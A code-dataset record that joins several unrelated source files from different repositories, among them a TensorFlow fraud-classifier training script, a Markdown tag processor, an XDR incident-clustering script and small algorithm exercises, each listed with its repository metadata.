src/visuanalytics/analytics/precondition/precondition.py
|
visuanalytics/visuanalytics
|
f9cce7bc9e3227568939648ddd1dd6df02eac752
|
[
"MIT"
] | 3 |
2020-08-24T19:02:09.000Z
|
2021-05-27T20:22:41.000Z
|
src/visuanalytics/analytics/precondition/precondition.py
|
SWTP-SS20-Kammer-2/Data-Analytics
|
23f71b49efed53bba2887d68e389c732566e1932
|
[
"MIT"
] | 342 |
2020-08-13T10:24:23.000Z
|
2021-08-12T14:01:52.000Z
|
src/visuanalytics/analytics/precondition/precondition.py
|
visuanalytics/visuanalytics
|
f9cce7bc9e3227568939648ddd1dd6df02eac752
|
[
"MIT"
] | 8 |
2020-09-01T07:11:18.000Z
|
2021-04-09T09:02:11.000Z
|
import logging
import time
from datetime import date
from visuanalytics.analytics.apis.api import fetch
from visuanalytics.analytics.util.type_utils import get_type_func, register_type_func
from visuanalytics.analytics.control.procedures.step_data import StepData
from visuanalytics.analytics.util.step_errors import PreconditionError, raise_step_error, PreconditionNotFulfilledError
# Registry mapping precondition type names to their handler functions
# (populated via the @register_precondition decorator below).
Precondition_TYPES = {}

logger = logging.getLogger(__name__)
@raise_step_error(PreconditionError)
def register_precondition(func):
    """Register *func* as a precondition type handler.

    Wraps the function in a try/except block and adds it to the
    ``Precondition_TYPES`` dictionary.

    :param func: the function to register
    :return: the function wrapped with a try/except block
    """
    return register_type_func(Precondition_TYPES, PreconditionError, func)
@raise_step_error(PreconditionError)
def precondition(values: dict, step_data: StepData):
    """Run the configured precondition handler, unless in testing mode."""
    if not values.get("precondition"):
        return
    # NOTE: the original deliberately checks ``is False`` — any other value
    # of the "testing" config (including None) skips the precondition.
    if step_data.get_config("testing", False) is False:
        handler = get_type_func(values["precondition"], Precondition_TYPES)
        handler(values, step_data)
@register_precondition
def date_today(values: dict, step_data: StepData):
    """Poll an API until a date field matches today's date.

    Performs the configured API request and compares the value found under
    ``values["precondition"]["key"]`` (truncated to ``key_split`` characters)
    with today's date formatted as ``%d.%m.%Y``. While they differ, the thread
    sleeps ``sleep_time`` seconds and tries again; after ``exit`` unsuccessful
    attempts a PreconditionNotFulfilledError is raised.

    :param values: values from the JSON file
    :param step_data: data from the API
    :raise PreconditionNotFulfilledError: if the precondition is still not
        fulfilled after the configured number of attempts
    """
    today_str = date.today().strftime("%d.%m.%Y")
    counter = 0
    sleep_time = values["precondition"]["sleep_time"]
    while True:
        fetch(values["precondition"]["request"], step_data, "_pre")
        compare = step_data.get_data(values["precondition"]["key"])
        if compare[:values["precondition"]["key_split"]] == today_str:
            break
        counter += 1
        # Fixed log message grammar ("is not fulfills" -> "is not fulfilled").
        logger.info(f"Precondition is not fulfilled, waiting {sleep_time} seconds before trying again")
        time.sleep(sleep_time)
        if counter >= values["precondition"]["exit"]:
            raise PreconditionNotFulfilledError(counter)
| 42.079365 | 142 | 0.741607 |
e91a3c5b14462d60ddbba2ceaac02201631ba6da
| 2,159 |
py
|
Python
|
research/cv/MaskedFaceRecognition/utils/distance.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/MaskedFaceRecognition/utils/distance.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/MaskedFaceRecognition/utils/distance.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Numpy version of euclidean distance, etc."""
import numpy as np
from utils.metric import cmc, mean_ap
def normalize(nparray, order=2, axis=0):
    """Normalize an N-D numpy array along the specified axis."""
    # A tiny epsilon keeps the division safe for all-zero slices.
    denom = np.linalg.norm(nparray, ord=order, axis=axis, keepdims=True)
    denom = denom + np.finfo(np.float32).eps
    return nparray / denom
def compute_dist(array1, array2, dis_type='euclidean'):
    """Compute pairwise distances between the rows of two 2-D arrays.

    Args:
        array1: numpy array with shape [m1, n]
        array2: numpy array with shape [m2, n]
        dis_type: one of ['cosine', 'euclidean']

    Returns:
        numpy array with shape [m1, m2]. For 'cosine' the *negated*
        cosine similarity is returned, so smaller always means closer.
    """
    assert dis_type in ['cosine', 'euclidean']
    if dis_type == 'cosine':
        sim = np.matmul(normalize(array1, axis=1), normalize(array2, axis=1).T)
        return -1 * sim
    # Euclidean via the expansion ||a - b||^2 = ||a||^2 + ||b||^2 - 2 a.b
    sq1 = np.sum(np.square(array1), axis=1)[..., np.newaxis]   # shape [m1, 1]
    sq2 = np.sum(np.square(array2), axis=1)[np.newaxis, ...]   # shape [1, m2]
    squared = sq1 + sq2 - 2 * np.matmul(array1, array2.T)
    # Rounding can produce tiny negative values; clamp before the sqrt.
    squared[squared < 0] = 0
    return np.sqrt(squared)
def compute_score(dist_mat, query_ids, gallery_ids):
    """Return (mAP, CMC scores up to top-10) for the given distance matrix."""
    mAP = mean_ap(distmat=dist_mat, query_ids=query_ids, gallery_ids=gallery_ids)
    cmc_scores, _ = cmc(distmat=dist_mat, query_ids=query_ids, gallery_ids=gallery_ids, topk=10)
    return mAP, cmc_scores
| 37.877193 | 96 | 0.66466 |
6e89acd1d140fefb3b14e8ee71ab03a7cbf1676e
| 12,431 |
py
|
Python
|
benchmark/playground.py
|
zentonllo/tfg-tensorflow
|
095469a906de26984b4d781699e76bec02b1ef75
|
[
"MIT"
] | null | null | null |
benchmark/playground.py
|
zentonllo/tfg-tensorflow
|
095469a906de26984b4d781699e76bec02b1ef75
|
[
"MIT"
] | null | null | null |
benchmark/playground.py
|
zentonllo/tfg-tensorflow
|
095469a906de26984b4d781699e76bec02b1ef75
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Fri May 26 11:03:21 2017
@author: Alberto Terceño
Module that uses deep neural networks to save logs and detailed results of the training process
The code was built up from scratch
"""
import tensorflow as tf
import argparse
from dataset import Dataset
from dnn_multiclass import *
# Uncomment the next line and comment the previous one if you want to use dnn with just one output neuron
#from dnn_binary import *
import sys
import os
from os.path import abspath
from leaky_relu import leaky_relu
from datetime import datetime
# Disable info warnings from TF
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'

# Parser FLAGS — populated by argparse in the __main__ block below.
FLAGS = None

# Change DEFAULT_ROOT_LOGDIR for the default log-dir
NOW = datetime.now().strftime("%Y-%m-%d--%Hh%Mm%Ss")
DEFAULT_ROOT_LOGDIR = '/tmp'
DEFAULT_LOG_DIR = "{}/playground-run-{}".format(DEFAULT_ROOT_LOGDIR, NOW)

# Default value for Momentum optimizer
MOMENTUM_PARAM = 0.9

# Default values for the FTRL optimizer (L1/L2 regularization strengths)
L1_PARAM = 0.0
L2_PARAM = 0.0
def print_hidden_layers(hidden_layers):
    """Print the neuron count of each hidden layer (None => logistic regression)."""
    if hidden_layers is None:
        print("Hidden Layers: None (Logistic regression is performed)")
        return
    for index, neurons in enumerate(hidden_layers, start=1):
        print("Hidden Layer", index, ":", neurons, "neurons")
def print_parameters(n_inputs, n_outputs, normalizer_params):
    """Print the model hyperparameters read from FLAGS."""
    print("Model hyperparameters (Binary classification problem)", "\n")
    print("Input variables:", n_inputs)
    print_hidden_layers(FLAGS.hidden_layers)
    print("Output variables:", n_outputs, "\n")
    print("Learning Rate:", FLAGS.learning_rate)
    print("Activation Function:", FLAGS.activation_function)
    print("Dropout Keep Probability:", FLAGS.dropout)
    print("Batch size:", FLAGS.batch_size)
    print("Regularization:", FLAGS.regularization)
    print("Regularization parameter (beta):", FLAGS.reg_param)
    use_bn = FLAGS.batch_norm
    print("Batch normalization:", 'Yes' if use_bn else 'No')
    if use_bn:
        print("Batch normalization parameters:", normalizer_params)
    print("Optimizer:", FLAGS.optimizer, "\n")
def parse_act_function():
    """Map FLAGS.activation_function to the matching TF activation function.

    Returns None when the flag does not name a known activation.
    """
    fun = FLAGS.activation_function
    tf_fun = None
    # Bug fix: the original compared strings with ``is``, which tests object
    # identity and only works by accident of CPython string interning.
    if fun == 'elu':
        tf_fun = tf.nn.elu
    elif fun == 'leaky_relu':
        tf_fun = leaky_relu
    elif fun == 'relu':
        tf_fun = tf.nn.relu
    elif fun == 'sigmoid':
        tf_fun = tf.nn.sigmoid
    elif fun == 'tanh':
        tf_fun = tf.nn.tanh
    elif fun == 'identity':
        tf_fun = tf.nn.identity
    return tf_fun
def parse_optimizer():
    """Build the TF optimizer selected by FLAGS.optimizer at FLAGS.learning_rate.

    Returns None when the flag does not name a known optimizer.
    """
    opt = FLAGS.optimizer
    learning_rate = FLAGS.learning_rate
    tf_opt = None
    # Bug fix: string comparison must use ``==``, not identity (``is``).
    if opt == 'adam':
        tf_opt = tf.train.AdamOptimizer(learning_rate=learning_rate, name='optimizer')
    elif opt == 'adagrad':
        tf_opt = tf.train.AdagradOptimizer(learning_rate=learning_rate, name='optimizer')
    elif opt == 'adadelta':
        tf_opt = tf.train.AdadeltaOptimizer(learning_rate=learning_rate, name='optimizer')
    elif opt == 'ftrl':
        tf_opt = tf.train.FtrlOptimizer(learning_rate=learning_rate, l1_regularization_strength=L1_PARAM, l2_regularization_strength=L2_PARAM, name='optimizer')
    elif opt == 'rms_prop':
        tf_opt = tf.train.RMSPropOptimizer(learning_rate=learning_rate, name='optimizer')
    elif opt == 'momentum':
        tf_opt = tf.train.MomentumOptimizer(learning_rate=learning_rate, momentum=MOMENTUM_PARAM, name='optimizer')
    elif opt == 'grad_descent':
        tf_opt = tf.train.GradientDescentOptimizer(learning_rate=learning_rate, name='optimizer')
    return tf_opt
def parse_regularizer():
    """Build the L1/L2 weight regularizer selected by FLAGS.regularization.

    Returns None when regularization is disabled or unrecognized.
    """
    reg = FLAGS.regularization
    beta = FLAGS.reg_param
    tf_reg = None
    if reg is None:
        return None
    # Bug fix: string comparison must use ``==``, not identity (``is``).
    if reg == 'L1':
        tf_reg = tf.contrib.layers.l1_regularizer(scale=beta, scope=None)
    elif reg == 'L2':
        tf_reg = tf.contrib.layers.l2_regularizer(scale=beta, scope=None)
    return tf_reg
def parse_normalizer():
    """Return (normalizer_fn, normalizer_params) for batch normalization.

    If batch normalization is enabled, the first layer normalizes the input
    data and higher learning rates become feasible. Returns (None, None)
    when FLAGS.batch_norm is off.
    """
    if FLAGS.batch_norm:
        normalizer_fn = tf.contrib.layers.batch_norm
    else:
        return None, None
    # Bug fix: the original used ``FLAGS.activation_function is 'relu'``
    # (identity comparison on strings); use equality instead.
    # ReLU discards negative values, so the scale (gamma) term is redundant.
    scale_term = FLAGS.activation_function != 'relu'
    normalizer_params = {
        'is_training': None,
        # 0.9, 0.99, 0.999 or 0.9999 ...
        # According to TF performance guide: lower it if training is ok and validation/test is performing worse
        # A.Geron suggests trying higher values for large datasets and small batch sizes
        'decay': 0.9,
        'updates_collections': None,
        # If we don't use activation functions --> scale: True
        'scale': scale_term,
        # The 'fused' parameter allows better performance according to the TF performance guide
        'fused': True
        # Try zero_debias_moving_mean=True for improved stability
        # 'zero_debias_moving_mean': True
    }
    return normalizer_fn, normalizer_params
def main(_):
    """End-to-end pipeline: load data, build the DNN, train, test and save plots.

    Reads all hyperparameters from the module-level FLAGS; writes logs,
    checkpoints, the ROC curve and confusion matrices under FLAGS.log_dir.
    """
    log_dir = FLAGS.log_dir
    log_dir = abspath(log_dir)
    # Start from an empty log directory on every run.
    if tf.gfile.Exists(log_dir):
        tf.gfile.DeleteRecursively(log_dir)
    tf.gfile.MakeDirs(log_dir)

    # Default paths for checkpoints and files generated
    M_FOLDER = abspath(log_dir + '/model')
    TR_FOLDER = abspath(log_dir + '/training')
    M_PATH = abspath(M_FOLDER + '/DNN.ckpt')
    TR_PATH = abspath(TR_FOLDER + '/DNN_tr.ckpt')
    ROC_PATH = abspath(log_dir + '/roc.png')
    CM_PATH = abspath(log_dir + '/cm.png')
    CM_PATH_NORM = abspath(log_dir + '/cm_norm.png')

    os.makedirs(M_FOLDER, exist_ok=True)
    os.makedirs(TR_FOLDER, exist_ok=True)
    # Equivalent to:
    # tf.gfile.MakeDirs(M_FOLDER)
    # tf.gfile.MakeDirs(TR_FOLDER)

    OUTPUT_FILE = os.path.abspath(log_dir+"/log.txt")
    # Redirect standard output to the log file (restored at the end of main).
    sys.stdout = open(OUTPUT_FILE, "w")

    # Recall that the file path doesn't have the extension. The Dataset class handles this.
    dataset_path = FLAGS.dataset_file

    # Data ingestion stage
    print("--------------------- (1) Starting to load dataset ---------------------","\n")
    dataset = Dataset(path = dataset_path, train_percentage = 0.8, test_percentage = 0.1 )
    x_test = dataset.x_test
    y_test = dataset.y_test
    print("Number of samples: ", dataset._num_examples)
    print("Number of features: ", dataset._num_features)
    print("--------------------- Dataset", dataset_path, "succesfully loaded ---------------------","\n")

    # We start to parse the hyperparameters
    n_inputs = dataset._num_features
    n_outputs = dataset._num_classes

    # Parsing hidden layers: input + hidden layers + output sizes.
    intermediate_layers = []
    if FLAGS.hidden_layers is not None:
        intermediate_layers = FLAGS.hidden_layers
    hidden_list = [n_inputs] + intermediate_layers + [n_outputs]

    # Parsing activation functions
    activation_function = parse_act_function()
    # (1 - keep_prob) is the dropout rate
    keep_prob = FLAGS.dropout
    nb_epochs = FLAGS.epochs
    batch_size = FLAGS.batch_size
    regularizer = parse_regularizer()
    normalizer_fn, normalizer_params = parse_normalizer()
    optimizer = parse_optimizer()

    # Print parameters used in the model
    print_parameters(n_inputs, n_outputs, normalizer_params)

    print("--------------------- (2) Starting to create the computational graph ---------------------","\n")
    dnn = DNN(log_dir = log_dir,
              hidden_list=hidden_list,
              activation_function = activation_function,
              keep_prob = keep_prob,
              regularizer = regularizer,
              normalizer_fn = normalizer_fn,
              normalizer_params = normalizer_params,
              optimizer = optimizer)
    print("--------------------- Graph created ---------------------","\n")

    print("--------------------- (3) Starting training ---------------------","\n")
    dnn.train(dataset=dataset,model_path=M_PATH, train_path=TR_PATH, nb_epochs=nb_epochs, batch_size=batch_size, silent_mode=False)
    print("--------------------- Training Finished ---------------------","\n")

    print("--------------------- (4) Starting test ---------------------","\n")
    dnn.test(x_test=x_test, y_test=y_test, model_path=M_PATH)
    print("--------------------- Test Finished ---------------------","\n")

    print("--------------------- (5) Saving model ROC curve ---------------------","\n")
    dnn.save_roc(x_test, y_test, model_path=M_PATH, roc_path=ROC_PATH)
    print("--------------------- ROC curve saved ---------------------","\n")

    print("--------------------- (5) Saving confusion matrix ---------------------","\n")
    dnn.save_cm(x_test, y_test, model_path=M_PATH, cm_path=CM_PATH_NORM, classes=['Normal transaction','Fraudulent transaction'],normalize=True)
    dnn.save_cm(x_test, y_test, model_path=M_PATH, cm_path=CM_PATH, classes=['Normal transaction','Fraudulent transaction'], normalize=False)
    print("--------------------- Confusion matrix saved ---------------------","\n")

    # Restore the real stdout that was redirected to the log file above.
    sys.stdout = sys.__stdout__
if __name__ == '__main__':
    # Build the CLI, store parsed options in the module-level FLAGS, and let
    # tf.app.run invoke main() with the remaining (unparsed) arguments.
    parser = argparse.ArgumentParser()
    parser.add_argument('--dataset_file',
                        required=True,
                        type=str,
                        help='Path for the dataset. Do not include the .csv or .npy extension! All the csv columns must be numeric. Label column in the csv is the last one.')
    parser.add_argument('--hidden_layers',
                        type=int,
                        default=None,
                        nargs='*',
                        help='Number of neurons in the hidden layers. Use None if logistic regression wants to be performed.')
    parser.add_argument('--epochs', type=int, default=200,
                        help='Number of epochs to train the model.')
    parser.add_argument('--batch_size', type=int, default=500,
                        help='Batch size used during training.')
    parser.add_argument('--learning_rate', type=float, default=0.001,
                        help='Initial learning rate.')
    parser.add_argument('--dropout', type=float, default=None,
                        help='Keep probability for training dropout, ie 1-dropout_rate. Use None to avoid using dropout')
    parser.add_argument('--activation_function', type=str, default='elu',
                        help='Activation function to use in the hidden layers: elu, relu, leaky_relu, sigmoid, tanh, identity.')
    parser.add_argument('--optimizer', type=str, default='adam',
                        help='Optimization method to use during training: adam, adagrad, rms_prop, ftrl, adadelta, momentum, grad_descent.')
    # --batch_norm / --no_batch_norm toggle the same destination flag.
    parser.add_argument('--batch_norm', dest='batch_norm', action='store_true', default=True,
                        help='Indicate whether to use batch normalization.')
    parser.add_argument('--no_batch_norm', dest='batch_norm', action='store_false', default=False,
                        help='Indicate whether to avoid batch normalization.')
    parser.add_argument('--regularization', type=str, default=None,
                        help='Indicate whether to use L1 or L2 regularization. Use None to avoid regularization')
    parser.add_argument('--reg_param', type=float, default=None,
                        help='Beta parameter for the regularization.')
    parser.add_argument('--log_dir', type=str, default=DEFAULT_LOG_DIR,
                        help='Log directory to store images and TensorBoard summaries')
    FLAGS, unparsed = parser.parse_known_args()
    tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| 36.136628 | 172 | 0.63776 |
42ce26a32e19cd517c59d4e86c92f15c7b2064ac
| 185 |
py
|
Python
|
apps/projects/apps.py
|
IT-PM-OpenAdaptronik/Webapp
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | 2 |
2017-12-17T21:28:22.000Z
|
2018-02-02T14:44:58.000Z
|
apps/projects/apps.py
|
IT-PM-OpenAdaptronik/Webapp
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | 118 |
2017-10-31T13:45:09.000Z
|
2018-02-24T20:51:42.000Z
|
apps/projects/apps.py
|
OpenAdaptronik/Rattler
|
c3bdde0ca56b6d77f49bc830fa2b8bb41a26bae4
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class ProjectsConfig(AppConfig):
    """Django application configuration for the projects app."""
    name = 'apps.projects'
    # Translatable human-readable name for the application.
    verbose_name = _('projects')
| 20.555556 | 54 | 0.762162 |
6e1113e0459faecb4d28f706ab4f824c23f88144
| 3,262 |
py
|
Python
|
verto/processors/GenericTagBlockProcessor.py
|
uccser/verto
|
d36aa88b208f1700fafc033679bd1e9775496d25
|
[
"MIT"
] | 4 |
2017-04-10T06:09:54.000Z
|
2019-05-04T02:07:40.000Z
|
verto/processors/GenericTagBlockProcessor.py
|
uccser/verto
|
d36aa88b208f1700fafc033679bd1e9775496d25
|
[
"MIT"
] | 268 |
2017-04-03T20:40:46.000Z
|
2022-02-04T20:10:08.000Z
|
verto/processors/GenericTagBlockProcessor.py
|
uccser/kordac
|
d36aa88b208f1700fafc033679bd1e9775496d25
|
[
"MIT"
] | 1 |
2019-01-07T15:46:31.000Z
|
2019-01-07T15:46:31.000Z
|
from markdown.blockprocessors import BlockProcessor
from verto.processors.utils import parse_arguments, process_parameters
from verto.utils.HtmlParser import HtmlParser
import re
class GenericTagBlockProcessor(BlockProcessor):
    ''' A generic processor that matches '{<name> args}' and replaces
    with the according html template.
    '''

    def __init__(self, processor, ext, *args, **kwargs):
        '''
        Args:
            processor: The name of the processor (key into the extension's
                processor_info / settings).
            ext: An instance of the Verto Extension.
        '''
        super().__init__(*args, **kwargs)
        self.processor = processor
        self.settings = ext.settings
        # The tag text defaults to the processor name unless overridden.
        tag_argument = ext.processor_info[self.processor].get('tag_argument', self.processor)
        # Matches '{tag args}' on a line of its own; '(?<! end)' excludes the
        # closing '{tag end}' form from this processor.
        self.pattern = re.compile(r'(^|\n) *\{{{0} ?(?P<args>[^\}}]*)(?<! end)\}} *(\n|$)'.format(tag_argument))
        self.arguments = ext.processor_info[self.processor]['arguments']
        template_name = ext.processor_info[self.processor].get('template_name', tag_argument)
        self.template = ext.jinja_templates[template_name]
        self.template_parameters = ext.processor_info[self.processor].get('template_parameters', None)
        # Bind the extension into process_parameters so later calls only need
        # (processor, parameters, argument_values).
        self.process_parameters = lambda processor, parameters, argument_values: \
            process_parameters(ext, processor, parameters, argument_values)

    def test(self, parent, block):
        ''' Tests a block to see if the run method should be applied.

        Args:
            parent: The parent node of the element tree that children
                will reside in.
            block: The block to be tested.

        Returns:
            True if there is a match within the block.
        '''
        return self.pattern.search(block) is not None

    def run(self, parent, blocks):
        ''' Generic run method for single match tags.

        Args:
            parent: The parent node of the element tree that children
                will reside in.
            blocks: A list of strings of the document, where the
                first block tests true.
        '''
        block = blocks.pop(0)

        match = self.pattern.search(block)
        # Text around the matched tag is handed back to the markdown parser.
        before = block[:match.start()]
        after = block[match.end():]

        if before.strip() != '':
            self.parser.parseChunk(parent, before)
        if after.strip() != '':
            blocks.insert(0, after)

        argument_values = parse_arguments(self.processor, match.group('args'), self.arguments)
        # Subclasses may contribute extra template values via custom_parsing.
        extra_args = self.custom_parsing(argument_values)
        argument_values.update(extra_args)

        context = self.process_parameters(self.processor, self.template_parameters, argument_values)
        html_string = self.template.render(context)
        parser = HtmlParser()
        parser.feed(html_string).close()
        parent.append(parser.get_root())

    def custom_parsing(self, argument_values):
        '''
        This serves as a placeholder method, to be used by processes that use the
        GenericTagBlockProcessor but need to carry out further parsing of
        the block's contents.

        Args:
            argument_values: Dictionary of values to be inserted in template.

        Returns:
            An empty dictionary (subclasses return extra template values).
        '''
        return {}
| 38.376471 | 112 | 0.640405 |
25020dbdf664c4300255a8453c4f9d1b0a94b026
| 598 |
py
|
Python
|
string_manipulation/longest_palindrome_substring.py
|
daesookimds/Algorithm
|
76f4cbfe9000e8c1736f470138499e7c735fecaa
|
[
"MIT"
] | null | null | null |
string_manipulation/longest_palindrome_substring.py
|
daesookimds/Algorithm
|
76f4cbfe9000e8c1736f470138499e7c735fecaa
|
[
"MIT"
] | null | null | null |
string_manipulation/longest_palindrome_substring.py
|
daesookimds/Algorithm
|
76f4cbfe9000e8c1736f470138499e7c735fecaa
|
[
"MIT"
] | null | null | null |
def longest_palindrome(s: str) -> str:
    """Return the longest palindromic substring of *s* (expand around center)."""
    # Fast paths: trivial strings and strings that are already palindromes.
    if len(s) < 2 or s == s[::-1]:
        return s

    def grow(lo: int, hi: int) -> str:
        # Widen [lo, hi] while the characters keep matching, then slice.
        while lo >= 0 and hi < len(s) and s[lo] == s[hi]:
            lo -= 1
            hi += 1
        return s[lo + 1:hi]

    best = ''
    for center in range(len(s) - 1):
        # Even-length seed (center, center+1) and odd-length seed (center, center+2).
        for candidate in (grow(center, center + 1), grow(center, center + 2)):
            if len(candidate) > len(best):
                best = candidate
    return best
def test_case():
    """Smoke-test longest_palindrome on the two classic examples.

    Previously this "test" only printed the results; it now also asserts
    them while keeping the original output.
    """
    case1 = 'babad'
    case2 = 'cbbd'
    result1 = longest_palindrome(case1)
    print(result1)
    # 'bab' and 'aba' are both valid answers of maximal length.
    assert result1 in ('bab', 'aba')
    result2 = longest_palindrome(case2)
    print(result2)
    assert result2 == 'bb'
| 22.148148 | 69 | 0.545151 |
c2655760805efbcbf83e25a201933c3ac4906ce6
| 754 |
py
|
Python
|
iwwb-download.py
|
maximiliankolb/iwwb-qm
|
2a67c3ec3976b8de6532100ad27d4f5c91b31890
|
[
"BSD-3-Clause"
] | null | null | null |
iwwb-download.py
|
maximiliankolb/iwwb-qm
|
2a67c3ec3976b8de6532100ad27d4f5c91b31890
|
[
"BSD-3-Clause"
] | null | null | null |
iwwb-download.py
|
maximiliankolb/iwwb-qm
|
2a67c3ec3976b8de6532100ad27d4f5c91b31890
|
[
"BSD-3-Clause"
] | null | null | null |
# parse json file to retrieve qm & download individual results to iwwb-qm/
# 2019-05-13 by maximilian
import urllib.request
from datetime import datetime
import json
import time

pathJson = 'iwwb-source.json'
pathFolder = 'iwwb-qm/'

# Fix: the JSON file was previously opened without ever being closed; a
# context manager releases the handle deterministically.
with open(pathJson, 'r') as json_file:
    json_arrays = json.load(json_file)

for quali in json_arrays['qm']:
    # Timestamped filename so repeated runs do not overwrite earlier downloads.
    myFilenameDate = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
    myQmTitle = str(quali['qmTitel'])
    myFilename = myFilenameDate + '_' + myQmTitle + '.html'
    myDownloadPath = pathFolder + myFilename
    myUrl = quali['qmQuelle']
    print(myUrl, myDownloadPath)
    time.sleep(1)  # throttle requests to the remote server
    try:
        urllib.request.urlretrieve(myUrl, myDownloadPath)
    except Exception:
        # Best effort: report the failing URL and continue with the next entry.
        print('error', myUrl)
| 25.133333 | 74 | 0.738727 |
6c034a7ca2ece6dadf69c287cd0ea8bbdf097bc4
| 1,390 |
py
|
Python
|
Packs/CortexXDR/Scripts/DBotGroupXDRIncidents/DBotGroupXDRIncidents.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/CortexXDR/Scripts/DBotGroupXDRIncidents/DBotGroupXDRIncidents.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/CortexXDR/Scripts/DBotGroupXDRIncidents/DBotGroupXDRIncidents.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
from CommonServerPython import *

# Clustering model configuration for Cortex XDR incidents.
model_name = 'xdr_clustering'
# Incident field whose contents drive the clustering.
field_for_grouping = 'xdralerts'
# Field used to label each resulting cluster.
field_for_name = 'xdralerts.causalityactorprocessimagename'

# The requested widget type decides the action: list incidents, show a
# summary of the stored model, or (re)train the model.
return_type = demisto.args()['returnWidgetType']

if return_type == 'incidents':
    # Return the incidents belonging to the stored model's clusters.
    res = demisto.executeCommand('DBotShowClusteringModelInfo', {
        'searchQuery': demisto.args().get('searchQuery'),
        'modelName': model_name,
        'returnType': 'incidents',
        'fieldsToDisplay': demisto.args().get('fieldsToDisplay')
    })
    demisto.results(res)
elif return_type == 'summary':
    # Return a summary view of the stored clustering model.
    res = demisto.executeCommand('DBotShowClusteringModelInfo', {
        'modelName': model_name
    })
    demisto.results(res)
else:
    args = demisto.args()  # NOTE(review): unused — kept to preserve behavior as-is
    # Train (or retrain) the clustering model over the selected incidents.
    res = demisto.executeCommand('DBotTrainClustering', {
        'modelName': model_name,
        'type': demisto.args().get('incidentType'),
        'fromDate': demisto.args().get('fromDate'),
        'limit': demisto.args().get('limit'),
        'fieldsForClustering': field_for_grouping,
        'fieldForClusterName': field_for_name,
        'storeModel': 'True',
        'searchQuery': demisto.args().get('searchQuery'),
        'forceRetrain': demisto.args().get('forceRetrain'),
        'numberOfFeaturesPerField': 500
    })
    # Widget scripts must output only the widget data, which is the last entry.
    demisto.results(res[-1])
| 36.578947 | 105 | 0.671942 |
666a35029fe3a6fb6d772f9feb33f0dc101dda36
| 1,205 |
py
|
Python
|
DataStructures/DisjoinSet/Communities.py
|
baby5/HackerRank
|
1e68a85f40499adb9b52a4da16936f85ac231233
|
[
"MIT"
] | null | null | null |
DataStructures/DisjoinSet/Communities.py
|
baby5/HackerRank
|
1e68a85f40499adb9b52a4da16936f85ac231233
|
[
"MIT"
] | null | null | null |
DataStructures/DisjoinSet/Communities.py
|
baby5/HackerRank
|
1e68a85f40499adb9b52a4da16936f85ac231233
|
[
"MIT"
] | null | null | null |
#coding:utf-8
def find(disjoin_set, i):
    """Return the root of element *i*, compressing the path along the way."""
    # A value <= -1 marks a root (roots store the negated set size).
    if disjoin_set[i] <= -1:
        return i
    root = find(disjoin_set, disjoin_set[i])
    disjoin_set[i] = root  # path compression: point directly at the root
    return root
# Python 2 script: reads N (elements) and Q (queries), then processes
# 'Q i' (report community size of i) and 'M i j' (merge communities) lines.
N, Q = map(int, raw_input().split())
# One extra slot so elements are addressed 1..N; each root stores -size.
disjoin_set = [-1] * (N+1)

for _ in xrange(Q):
    s = raw_input()
    if s.startswith('Q'):
        i = int(s.split()[1])
        # Recursive find with path compression.
        i = find(disjoin_set, i)
        '''
        #循环找根,如果要实现路径压缩,要把所有父节点不为根的节点记录下来,最后统一替换为根节点,因为循环过程中还不知道根节点在哪里。
        while disjoin_set[i] > -1:
            i = disjoin_set[i]
        '''
        # The root entry holds -size, so the community size is its absolute value.
        print abs(disjoin_set[i])
    elif s.startswith('M'):
        i, j = map(int, s.split()[1:])
        # find() during union compresses the paths as a side effect.
        i = find(disjoin_set, i)
        j = find(disjoin_set, j)
        '''
        while disjoin_set[i] > -1:
            i = disjoin_set[i]
        while disjoin_set[j] > -1:
            j = disjoin_set[j]
        '''
        if i == j:
            continue
        # Union by size: attach the smaller tree under the larger root.
        if abs(disjoin_set[i]) > abs(disjoin_set[j]):
            disjoin_set[i] += disjoin_set[j]
            disjoin_set[j] = i
        else:
            disjoin_set[j] += disjoin_set[i]
            disjoin_set[i] = j
| 23.173077 | 71 | 0.495436 |
dd7aeba908670838be98b1a649a4354c13cd0ecd
| 1,456 |
py
|
Python
|
DQN/CartPole/run_this.py
|
pickxiguapi/rl-algorithm
|
a57991acd178077fd7f51bcd4ae2ee58492475c2
|
[
"MIT"
] | 2 |
2021-01-06T09:45:23.000Z
|
2021-04-21T09:39:14.000Z
|
DQN/CartPole/run_this.py
|
pickxiguapi/rl-algorithm
|
a57991acd178077fd7f51bcd4ae2ee58492475c2
|
[
"MIT"
] | null | null | null |
